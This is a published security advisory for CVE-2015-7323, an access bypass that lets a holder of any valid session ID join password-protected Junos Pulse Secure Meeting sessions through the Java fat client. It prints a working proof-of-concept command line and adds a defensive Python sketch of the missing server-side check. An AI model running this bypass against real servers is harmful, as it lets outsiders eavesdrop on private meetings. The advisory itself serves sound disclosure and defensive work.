Junos Pulse Secure Meeting 8.0.5 Access Bypass
Posted on 26 September 2015
Profundis Labs Security Advisory
https://profundis-labs.com/advisories/CVE-2015-7323.txt

Product:
================================
Junos Pulse Secure Meeting

Secure Meeting is a part of the Junos Pulse Collaboration software, which allows you to organize and hold virtual meetings with internal and external users via the Juniper Access Gateway.

Vulnerability Type:
===================
Insufficient Authorization Checks

CVE Reference:
==============
CVE-2015-7323

VENDOR Reference:
=================
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054

Vulnerability Details:
=====================
It is possible to enter "secure" meetings without knowledge of the password and the invitation link using the Java fat client (meetingAppSun.jar). To access such meetings the following information is required:

- A valid sessionID (DSID). This sessionID can be obtained either by having an invitation link to any other meeting or by logging into Junos Pulse with a valid account using the HTTP login form.
- The meeting ID

The meeting ID is a 7-8 digit number which may be obtained using brute force or via CVE-2015-7322 (https://profundis-labs.com/advisories/CVE-2015-7322.txt)

Note: The vulnerability is only related to the Java fat client. If a user tries to access a secure meeting using the web browser (https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0), the meeting password (or invitation link) is required.

PoC code(s):
===============
Example of how to start the Java fat client from the command line to access a meeting A:

java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type 0 Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid "DSID=PARAM_C"

PARAM_A = meeting ID of Meeting A
PARAM_B = MD5 hash of the SSL certificate of the Junos Pulse server
PARAM_C = a valid sessionID
PARAM_D = the domain/IP of the Junos Pulse server

Disclosure Timeline:
=========================================================
Vendor Notification: 01/2015
Vendor Confirmation: 03/2015
Vendor Patch Release: 06/2015
Public Disclosure: 09/2015

Affected Version:
=========================================================
8.0.5

Exploitation Technique:
=======================
Remote

Severity Level:
=========================================================
CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)
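
The authorization gap described under Vulnerability Details, modelled as an added example that is not part of the advisory and is not Pulse Secure code: it contrasts an admission check that accepts any valid session with one that binds the session to the specific meeting. All names (join_weak, join_hardened, Session, Meeting) and the sample IDs and passwords are hypothetical and constructed for illustration.

```python
import hmac
from dataclasses import dataclass, field

@dataclass
class Meeting:
    password: str

@dataclass
class Session:
    user: str
    # Meeting IDs this session was issued for via an invitation link.
    invited_to: set = field(default_factory=set)

# Constructed sample data: two meetings, one guest session invited to meeting A only.
MEETING_A, MEETING_B = "1000001", "2000002"
MEETINGS = {MEETING_A: Meeting("pw-for-a"), MEETING_B: Meeting("pw-for-b")}
SESSIONS = {"dsid-guest-a": Session("guest", {MEETING_A})}

def join_weak(dsid, meeting_id, password=""):
    """Flawed pattern: any valid session plus an existing meeting ID is admitted."""
    return dsid in SESSIONS and meeting_id in MEETINGS

def join_hardened(dsid, meeting_id, password=""):
    """Admit only a session entitled to this specific meeting."""
    session = SESSIONS.get(dsid)
    meeting = MEETINGS.get(meeting_id)
    if session is None or meeting is None:
        return False
    if meeting_id in session.invited_to:
        return True
    # No invitation for this meeting: require its password (constant-time compare).
    return bool(password) and hmac.compare_digest(
        password.encode(), meeting.password.encode())

if __name__ == "__main__":
    for mid in (MEETING_A, MEETING_B):
        print(mid, join_weak("dsid-guest-a", mid), join_hardened("dsid-guest-a", mid))
```

The check belongs on the server and must apply to every client path, since the advisory notes the browser path already required the password or invitation link while the fat client path did not.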